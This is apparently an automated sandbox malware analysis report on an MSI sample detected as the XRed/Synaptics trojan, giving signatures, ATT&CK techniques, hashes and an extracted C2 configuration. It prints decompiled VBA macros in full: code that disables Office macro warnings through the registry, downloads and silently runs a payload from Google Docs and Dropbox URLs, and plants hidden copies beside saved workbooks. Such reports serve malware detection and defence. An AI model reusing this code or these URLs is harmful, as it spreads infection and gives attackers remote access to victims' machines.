Windows
Analysis Report
valyzt.msi
Overview
General Information
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w11x64_office
- msiexec.exe (PID: 7892 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\valyzt.msi" MD5: C0D3BDDE74C1EC82F75681D4D5ED44C8)
- cleanup
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XRed | Yara detected XRed | Joe Security | ||
JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Networking |
---|
Source: | URLs: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary |
---|
Source: | OLE, VBA macro: | Name: SaveAsInj | ||
Source: | OLE, VBA macro: | Name: RegKeyRead | ||
Source: | OLE, VBA macro: | Name: RegKeyExists | ||
Source: | OLE, VBA macro: | Name: RegKeySave | ||
Source: | OLE, VBA macro: | Name: MPS | ||
Source: | OLE, VBA macro: | Name: MPS | ||
Source: | OLE, VBA macro: | Name: MPS | ||
Source: | OLE, VBA macro: | Name: MPS | ||
Source: | OLE, VBA macro: | Name: MPS | ||
Source: | OLE, VBA macro: | Name: FDW | ||
Source: | OLE, VBA macro: | Name: FDW |
Source: | OLE, VBA macro: | Name: FDW |
Source: | OLE, VBA macro: | Name: FDW |
Source: | OLE, VBA macro: | Name: Workbook_Open | ||
Source: | OLE, VBA macro: | Name: Workbook_BeforeClose |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File source: |
Source: | ReversingLabs: |
Source: | Static file information: |
Source: | Thread injection, dropped files, key value created, disk infection and DNS query: |
Source: | Thread injection, dropped files, key value created, disk infection and DNS query: |
Stealing of Sensitive Information |
---|
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 31 Scripting | 1 Replication Through Removable Media | Windows Management Instrumentation | 31 Scripting | 1 DLL Side-Loading | 1 DLL Side-Loading | OS Credential Dumping | 1 Peripheral Device Discovery | Remote Services | Data from Local System | 2 Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
66% | ReversingLabs | Win32.Trojan.Synaptics |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1582346 |
Start date and time: | 2024-12-30 11:41:02 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 3m 50s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09 |
Run name: | Potential for more IOCs and behavior |
Number of new started processes analysed: | 28 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | valyzt.msi |
Detection: | MAL |
Classification: | mal80.troj.expl.winMSI@1/0@0/0 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 204.79.197.203, 184.28.90.27, 4.175.87.197, 20.199.58.43, 40.126.32.133
- Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, fd.api.iris.microsoft.com, a-0003.a-msedge.net, oneocsp-microsoft-com.a-0003.a-msedge.net, ctldl.windowsupdate.com, oneocsp.microsoft.com, x1.c.lencr.org, ocsp.digicert.com, login.live.com, res.public.onecdn.static.microsoft, ocsp.edge.digicert.com, c.pki.goog
- Not all processes were analyzed, report is missing behavior information
- VT rate limit hit for: valyzt.msi
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
fp2e7a.wpc.phicdn.net | Get hash | malicious | XRed | Browse |
Get hash | malicious | ScreenConnect Tool | Browse |
Get hash | malicious | Python Stealer, Creal Stealer | Browse |
Get hash | malicious | Nitol, Zegost | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | CobaltStrike, Metasploit | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | Unknown | Browse |
Get hash | malicious | Credential Flusher | Browse |
File type: | |
Entropy (8bit): | 7.422118768157554 |
TrID: |
|
File name: | valyzt.msi |
File size: | 1'748'992 bytes |
MD5: | 53614b87538306b4f7437db8be2a0e47 |
SHA1: | a6a777b24bb64067738386caa66787b8ed225726 |
SHA256: | e86d059bd44bc6e4252972320cb811497ea87f3b0ef10eed5edfcd7acf44a3d8 |
SHA512: | cfed71c6b9eb55b3ebfb53cbdb1611e8921a6dbe7b7efc5456cebb9bfb3d6a64f23a97c63415d61c38c4e3b540a79fd50cb2a080220bf3ea32edc98f85e6ecc1 |
SSDEEP: | 49152:PElnsHyjtk2MYC5GD8hloJfCAh9RMUBrNUFqtBZl:Gnsmtk2a1hlPERBsiT |
TLSH: | C985C0B2B3818436D433563C8C7B93A75427BE5D1D38690E3BE57E4E6E3A34228261D7 |
Icon Hash: | bdb5fdd8b3b39b1f |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Dec 30, 2024 11:41:52.283139944 CET | 1.1.1.1 | 192.168.2.24 | 0xd705 | No error (0) | fp2e7a.wpc.phicdn.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Dec 30, 2024 11:41:52.283139944 CET | 1.1.1.1 | 192.168.2.24 | 0xd705 | No error (0) | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
Target ID: | 1 |
Start time: | 05:41:57 |
Start date: | 30/12/2024 |
Path: | C:\Windows\System32\msiexec.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b7e50000 |
File size: | 176'128 bytes |
MD5 hash: | C0D3BDDE74C1EC82F75681D4D5ED44C8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Module: Sayfa1
Declaration
Line | Content |
---|---|
1 | Attribute VB_Name = "Sayfa1" |
2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |
Module: ThisWorkbook
Declaration
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisWorkbook" |
2 | Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |
9 | Dim SheetsChanged as Boolean |
10 | Dim SheetCount as Integer |
APIs | Meta Information |
---|---|
CreateObject | |
Path | |
ActiveWorkbook | |
Path | |
ActiveWorkbook | |
Environ | |
FileExists | |
FileExists | |
FileCopy | |
Shell | |
vbHide | |
FileExists | |
FileExists | |
FileCopy | |
Shell | |
vbHide | |
FileExists | |
Environ | |
Shell | |
Environ | |
vbHide | |
FileExists | |
Environ | |
Shell | |
Environ | |
vbHide | |
FileExists | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: Option | |
Part of subcall function FDW@ThisWorkbook: Option | |
Part of subcall function FDW@ThisWorkbook: AllowRedirects | |
Part of subcall function FDW@ThisWorkbook: Open | |
Part of subcall function FDW@ThisWorkbook: Send | |
Part of subcall function FDW@ThisWorkbook: Status | |
Part of subcall function FDW@ThisWorkbook: InStr | |
Part of subcall function FDW@ThisWorkbook: ResponseText | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: Open | |
Part of subcall function FDW@ThisWorkbook: Type | |
Part of subcall function FDW@ThisWorkbook: Write | |
Part of subcall function FDW@ThisWorkbook: ResponseBody | |
Part of subcall function FDW@ThisWorkbook: SaveToFile | |
Part of subcall function FDW@ThisWorkbook: Close | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: Option | |
Part of subcall function FDW@ThisWorkbook: Option | |
Part of subcall function FDW@ThisWorkbook: AllowRedirects | |
Part of subcall function FDW@ThisWorkbook: Open | |
Part of subcall function FDW@ThisWorkbook: Send | |
Part of subcall function FDW@ThisWorkbook: Status | |
Part of subcall function FDW@ThisWorkbook: InStr | |
Part of subcall function FDW@ThisWorkbook: ResponseText | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: Open | |
Part of subcall function FDW@ThisWorkbook: Type | |
Part of subcall function FDW@ThisWorkbook: Write | |
Part of subcall function FDW@ThisWorkbook: ResponseBody | |
Part of subcall function FDW@ThisWorkbook: SaveToFile | |
Part of subcall function FDW@ThisWorkbook: Close | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: Option | |
Part of subcall function FDW@ThisWorkbook: Option | |
Part of subcall function FDW@ThisWorkbook: AllowRedirects | |
Part of subcall function FDW@ThisWorkbook: Open | |
Part of subcall function FDW@ThisWorkbook: Send | |
Part of subcall function FDW@ThisWorkbook: Status | |
Part of subcall function FDW@ThisWorkbook: InStr | |
Part of subcall function FDW@ThisWorkbook: ResponseText | |
Part of subcall function FDW@ThisWorkbook: CreateObject | |
Part of subcall function FDW@ThisWorkbook: Open | |
Part of subcall function FDW@ThisWorkbook: Type | |
Part of subcall function FDW@ThisWorkbook: Write | |
Part of subcall function FDW@ThisWorkbook: ResponseBody | |
Part of subcall function FDW@ThisWorkbook: SaveToFile | |
Part of subcall function FDW@ThisWorkbook: Close | |
FileExists | |
Shell | |
vbHide | |
Shell | |
vbHide |
Strings | Decrypted Strings |
---|---|
"scripting.filesystemobject" | |
"https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download" | |
"https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1" | |
"https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1" | |
"Temp" | |
"ALLUSERSPROFILE" | |
"ALLUSERSPROFILE" | |
"WINDIR" | |
"WINDIR" |
Line | Instruction | Meta Information |
---|---|---|
147 | Sub MPS() | |
148 | Dim FSO as Object | |
149 | Dim FP(1 To 3), TMP, URL(1 To 3) as String | |
151 | Set FSO = CreateObject("scripting.filesystemobject") | CreateObject |
152 | FP(1) = ActiveWorkbook.Path & "\~$cache1" | Path ActiveWorkbook |
153 | FP(2) = ActiveWorkbook.Path & "\Synaptics.exe" | Path ActiveWorkbook |
155 | URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download" | |
156 | URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1" | |
157 | URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1" | |
158 | TMP = Environ("Temp") & "\~$cache1.exe" | Environ |
160 | If FSO.FileExists(FP(1)) Then | FileExists |
161 | If Not FSO.FileExists(TMP) Then | FileExists |
162 | FileCopy FP(1), TMP | FileCopy |
163 | Endif | |
164 | Shell TMP, vbHide | Shell vbHide |
165 | Elseif FSO.FileExists(FP(2)) Then | FileExists |
166 | If Not FSO.FileExists(TMP) Then | FileExists |
167 | FileCopy FP(2), TMP | FileCopy |
168 | Endif | |
169 | Shell TMP, vbHide | Shell vbHide |
170 | Else | |
171 | If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then | FileExists Environ |
172 | Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide | Shell Environ vbHide |
173 | Elseif FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then | FileExists Environ |
174 | Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide | Shell Environ vbHide |
175 | Elseif Not FSO.FileExists(TMP) Then | FileExists |
176 | If FDW((URL(1)), (TMP)) Then | |
177 | Elseif FDW((URL(2)), (TMP)) Then | |
178 | Elseif FDW((URL(3)), (TMP)) Then | |
179 | Endif | |
180 | If FSO.FileExists(TMP) Then | FileExists |
181 | Shell TMP, vbHide | Shell vbHide |
182 | Endif | |
183 | Else | |
184 | Shell TMP, vbHide | Shell vbHide |
185 | Endif | |
187 | Endif | |
189 | End Sub |
APIs | Meta Information |
---|---|
Sheets | |
Sheets | |
xlSheetVisible | |
Part of subcall function RegKeySave@ThisWorkbook: CreateObject | |
Part of subcall function RegKeySave@ThisWorkbook: RegWrite | |
Version | |
Part of subcall function RegKeySave@ThisWorkbook: CreateObject | |
Part of subcall function RegKeySave@ThisWorkbook: RegWrite | |
Version | |
DisplayAlerts | |
Count | |
Worksheets | |
Part of subcall function MPS@ThisWorkbook: CreateObject | |
Part of subcall function MPS@ThisWorkbook: Path | |
Part of subcall function MPS@ThisWorkbook: ActiveWorkbook | |
Part of subcall function MPS@ThisWorkbook: Path | |
Part of subcall function MPS@ThisWorkbook: ActiveWorkbook | |
Part of subcall function MPS@ThisWorkbook: Environ | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: FileCopy | |
Part of subcall function MPS@ThisWorkbook: Shell | |
Part of subcall function MPS@ThisWorkbook: vbHide | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: FileCopy | |
Part of subcall function MPS@ThisWorkbook: Shell | |
Part of subcall function MPS@ThisWorkbook: vbHide | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: Environ | |
Part of subcall function MPS@ThisWorkbook: Shell | |
Part of subcall function MPS@ThisWorkbook: Environ | |
Part of subcall function MPS@ThisWorkbook: vbHide | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: Environ | |
Part of subcall function MPS@ThisWorkbook: Shell | |
Part of subcall function MPS@ThisWorkbook: Environ | |
Part of subcall function MPS@ThisWorkbook: vbHide | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: FileExists | |
Part of subcall function MPS@ThisWorkbook: Shell | |
Part of subcall function MPS@ThisWorkbook: vbHide | |
Part of subcall function MPS@ThisWorkbook: Shell | |
Part of subcall function MPS@ThisWorkbook: vbHide | |
Select |
Strings | Decrypted Strings |
---|---|
"HKCU\Software\Microsoft\Office\" | |
"REG_DWORD" | |
"HKCU\Software\Microsoft\Office\" | |
"REG_DWORD" |
Line | Instruction | Meta Information |
---|---|---|
12 | Private Sub Workbook_Open() | |
13 | Dim i as Integer | |
14 | For i = 1 To ActiveWorkbook.Sheets.Count | Sheets |
15 | ActiveWorkbook.Sheets(i).Visible = xlSheetVisible | Sheets xlSheetVisible |
16 | Next i | Sheets |
18 | RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD" | Version |
19 | RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD" | Version |
21 | Application.DisplayAlerts = False | DisplayAlerts |
22 | SheetCount = Worksheets.Count | Count Worksheets |
24 | Call MPS() | |
26 | ActiveWorkbook.Sheets(1).Select | Select |
27 | SheetsChanged = False | |
28 | End Sub |
APIs | Meta Information |
---|---|
CreateObject | |
CreateObject | |
Option | |
Option | |
AllowRedirects | |
Open | |
Send | |
Status | |
InStr | |
ResponseText | |
CreateObject | |
Open | |
Type | |
Write | |
ResponseBody | |
SaveToFile | |
Close |
Strings | Decrypted Strings |
---|---|
"WinHttp.WinHttpRequest.5.1" | |
"WinHttp.WinHttpRequest.5" | |
"WinHttp.WinHttpRequest.5" | |
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" | |
"GET" | |
"404 Not Found" | |
">Not Found<" | |
"ADODB.Stream" | |
"Dropbox - Error" | |
"404 Not Found" | |
">Not Found<" | |
"ADODB.Stream" | |
"Dropbox - Error" | |
"ADODB.Stream" |
Line | Instruction | Meta Information |
---|---|---|
191 | Function FDW(MYU, NMA as String) as Boolean | |
192 | Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1") | CreateObject |
193 | If WinHttpReq Is Nothing Then | |
194 | Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5") | CreateObject |
195 | Endif | |
197 | WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" | Option |
198 | WinHttpReq.Option(6) = AllowRedirects | Option AllowRedirects |
199 | WinHttpReq.Open "GET", MYU, False | Open |
200 | WinHttpReq.Send | Send |
202 | If (WinHttpReq.Status = 200) Then | Status |
203 | If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then | InStr ResponseText |
204 | FDW = True | |
205 | Set oStream = CreateObject("ADODB.Stream") | CreateObject |
206 | oStream.Open | Open |
207 | oStream.Type = 1 | Type |
208 | oStream.Write WinHttpReq.ResponseBody | Write ResponseBody |
209 | oStream.SaveToFile (NMA) | SaveToFile |
210 | oStream.Close | Close |
211 | Else | |
212 | FDW = False | |
213 | Endif | |
214 | Else | |
215 | FDW = False | |
216 | Endif | |
217 | End Function |
APIs | Meta Information |
---|---|
CreateObject | |
Environ | |
FileExists | |
FileExists | |
FileCopy | |
SetAttr | |
vbHidden | |
vbSystem |
Strings | Decrypted Strings |
---|---|
"scripting.filesystemobject" | |
"ALLUSERSPROFILE" |
Line | Instruction | Meta Information |
---|---|---|
102 | Sub SaveAsInj(DIR as String) | |
103 | Dim FSO as Object | |
104 | Dim FN as String | |
106 | Set FSO = CreateObject("scripting.filesystemobject") | CreateObject |
107 | FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe" | Environ |
109 | If FSO.FileExists(FN) Then | FileExists |
110 | If Not FSO.FileExists(DIR & "\~$cache1") Then | FileExists |
111 | FileCopy FN, DIR & "\~$cache1" | FileCopy |
112 | Endif | |
113 | SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem | SetAttr vbHidden vbSystem |
114 | Endif | |
115 | End Sub |
APIs | Meta Information |
---|---|
CreateObject | |
RegRead |
Strings | Decrypted Strings |
---|---|
"WScript.Shell" |
Line | Instruction | Meta Information |
---|---|---|
125 | Function RegKeyExists(i_RegKey as String) as Boolean | |
126 | Dim myWS as Object | |
128 | On Error Goto ErrorHandler | |
129 | Set myWS = CreateObject("WScript.Shell") | CreateObject |
130 | myWS.RegRead i_RegKey | RegRead |
131 | RegKeyExists = True | |
132 | Exit Function | |
133 | ErrorHandler: | |
135 | RegKeyExists = False | |
136 | End Function |
APIs | Meta Information |
---|---|
CreateObject | |
RegRead |
Strings | Decrypted Strings |
---|---|
"WScript.Shell" |
Line | Instruction | Meta Information |
---|---|---|
117 | Function RegKeyRead(i_RegKey as String) as String | |
118 | Dim myWS as Object | |
120 | On Error Resume Next | |
121 | Set myWS = CreateObject("WScript.Shell") | CreateObject |
122 | RegKeyRead = myWS.RegRead(i_RegKey) | RegRead |
123 | End Function |
APIs | Meta Information |
---|---|
CreateObject | |
RegWrite |
Strings | Decrypted Strings |
---|---|
"WScript.Shell" |
Line | Instruction | Meta Information |
---|---|---|
138 | Sub RegKeySave(i_RegKey as String, i_Value as String, optional i_Type as String = "REG_SZ") | |
141 | Dim myWS as Object | |
143 | Set myWS = CreateObject("WScript.Shell") | CreateObject |
144 | myWS.RegWrite i_RegKey, i_Value, i_Type | RegWrite |
145 | End Sub |
APIs | Meta Information |
---|---|
Saved |
Line | Instruction | Meta Information |
---|---|---|
30 | Private Sub Workbook_BeforeClose(Cancel as Boolean) | |
31 | If Not SheetsChanged Then | |
32 | ActiveWorkbook.Saved = True | Saved |
33 | Endif | |
34 | End Sub |
APIs | Meta Information |
---|---|
ActiveSheet | |
EnableEvents | |
ScreenUpdating | |
Sheets | |
Sheets | |
xlSheetHidden | |
Save | |
Sheets | |
Sheets | |
xlSheetVisible | |
Select | |
ScreenUpdating | |
EnableEvents | |
EnableEvents | |
ScreenUpdating | |
Sheets | |
Sheets | |
xlSheetHidden | |
GetSaveAsFilename | |
SaveAs | |
xlOpenXMLWorkbookMacroEnabled | |
Part of subcall function SaveAsInj@ThisWorkbook: CreateObject | |
Part of subcall function SaveAsInj@ThisWorkbook: Environ | |
Part of subcall function SaveAsInj@ThisWorkbook: FileExists | |
Part of subcall function SaveAsInj@ThisWorkbook: FileExists | |
Part of subcall function SaveAsInj@ThisWorkbook: FileCopy | |
Part of subcall function SaveAsInj@ThisWorkbook: SetAttr | |
Part of subcall function SaveAsInj@ThisWorkbook: vbHidden | |
Part of subcall function SaveAsInj@ThisWorkbook: vbSystem | |
Path | |
Sheets | |
Sheets | |
xlSheetVisible | |
Select | |
ScreenUpdating | |
EnableEvents |
Strings | Decrypted Strings |
---|---|
"Excel Çalışma Kitabı (*.xlsm), *.xlsm" |
Line | Instruction | Meta Information |
---|---|---|
51 | Private Sub Workbook_BeforeSave(ByVal SaveAsUI as Boolean, Cancel as Boolean) | |
52 | Dim i as Integer | |
53 | Dim AIndex as Integer | |
54 | Dim FName | |
56 | AIndex = ActiveWorkbook.ActiveSheet.Index | ActiveSheet |
58 | If SaveAsUI = False Then | |
59 | Cancel = True | |
60 | Application.EnableEvents = False | EnableEvents |
61 | Application.ScreenUpdating = False | ScreenUpdating |
63 | For i = 1 To ActiveWorkbook.Sheets.Count - 1 | Sheets |
64 | ActiveWorkbook.Sheets(i).Visible = xlSheetHidden | Sheets xlSheetHidden |
65 | Next i | Sheets |
66 | ActiveWorkbook.Save | Save |
68 | For i = 1 To ActiveWorkbook.Sheets.Count | Sheets |
69 | ActiveWorkbook.Sheets(i).Visible = xlSheetVisible | Sheets xlSheetVisible |
70 | Next i | Sheets |
71 | ActiveWorkbook.Sheets(AIndex).Select | Select |
72 | SheetsChanged = False | |
74 | Application.ScreenUpdating = True | ScreenUpdating |
75 | Application.EnableEvents = True | EnableEvents |
76 | Else | |
77 | Cancel = True | |
78 | Application.EnableEvents = False | EnableEvents |
79 | Application.ScreenUpdating = False | ScreenUpdating |
81 | For i = 1 To ActiveWorkbook.Sheets.Count - 1 | Sheets |
82 | ActiveWorkbook.Sheets(i).Visible = xlSheetHidden | Sheets xlSheetHidden |
83 | Next i | Sheets |
85 | FName = Application.GetSaveAsFilename(fileFilter := "Excel Çalışma Kitabı (*.xlsm), *.xlsm") | GetSaveAsFilename |
86 | If FName <> False Then | |
87 | ActiveWorkbook.SaveAs Filename := FName, FileFormat := xlOpenXMLWorkbookMacroEnabled | SaveAs xlOpenXMLWorkbookMacroEnabled |
88 | SaveAsInj ActiveWorkbook.Path | Path |
89 | Endif | |
91 | For i = 1 To ActiveWorkbook.Sheets.Count | Sheets |
92 | ActiveWorkbook.Sheets(i).Visible = xlSheetVisible | Sheets xlSheetVisible |
93 | Next i | Sheets |
94 | ActiveWorkbook.Sheets(AIndex).Select | Select |
95 | SheetsChanged = False | |
97 | Application.ScreenUpdating = True | ScreenUpdating |
98 | Application.EnableEvents = True | EnableEvents |
99 | Endif | |
100 | End Sub |
APIs | Meta Information |
---|---|
Sheets | |
ActiveWorkbook | |
Sheets | |
ActiveWorkbook |
Line | Instruction | Meta Information |
---|---|---|
44 | Private Sub Workbook_SheetActivate(ByVal Sh as Object) | |
45 | If ActiveWorkbook.Sheets.Count <> SheetCount Then | Sheets ActiveWorkbook |
46 | SheetsChanged = True | |
47 | SheetCount = ActiveWorkbook.Sheets.Count | Sheets ActiveWorkbook |
48 | Endif | |
49 | End Sub |
Line | Instruction | Meta Information |
---|---|---|
36 | Private Sub Workbook_SheetChange(ByVal Sh as Object, ByVal Target as Range) | |
37 | SheetsChanged = True | |
38 | End Sub |
Line | Instruction | Meta Information |
---|---|---|
40 | Private Sub Workbook_NewSheet(ByVal Sh as Object) | |
41 | SheetsChanged = True | |
42 | End Sub |